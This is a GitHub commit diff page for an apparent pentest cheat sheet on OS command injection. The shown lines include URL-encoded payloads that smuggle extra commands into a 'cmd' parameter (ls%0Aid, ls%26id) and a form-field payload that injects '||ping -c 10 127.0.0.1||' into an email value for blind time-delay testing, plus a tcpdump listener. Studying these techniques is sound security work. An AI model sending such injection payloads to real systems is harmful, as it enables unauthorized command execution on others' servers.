-
Notifications
You must be signed in to change notification settings - Fork 135
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
8 changed files
with
91 additions
and
32 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -6,7 +6,7 @@ tags: | |
- Reverse Shell | ||
- Web | ||
refs: | ||
date: 2024-10-03 | ||
date: 2024-10-25 | ||
draft: false | ||
--- | ||
|
||
|
@@ -66,6 +66,8 @@ We may be able to bypass specific character filter by encoding them. | |
/?cmd=ls%0Aid | ||
# %250A: newline (double encoding) | ||
/?cmd=ls%250Aid | ||
# Adding at the end. | ||
/?cmd=ls%0Aid%0A | ||
# %26: & | ||
/?cmd=ls%26id | ||
|
@@ -117,8 +119,7 @@ To confirm the result, start tcpdump in our local machine. | |
sudo tcpdump -i eth0 icmp | ||
``` | ||
|
||
Then execute ping command in POST request. | ||
|
||
Then execute ping command in POST request. | ||
Below are examples for POST data. | ||
|
||
```bash | ||
|
@@ -152,7 +153,7 @@ vim shell.php | |
|
||
## Blind Command Injection (Time Delay) | ||
|
||
Use **"ping"** command to check if the website will be loaded with time delay. | ||
Use `ping` command to check if the website will be loaded with time delay. | ||
|
||
```txt | ||
name=michael&[email protected]||ping+-c+10+127.0.0.1||&message=hello | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters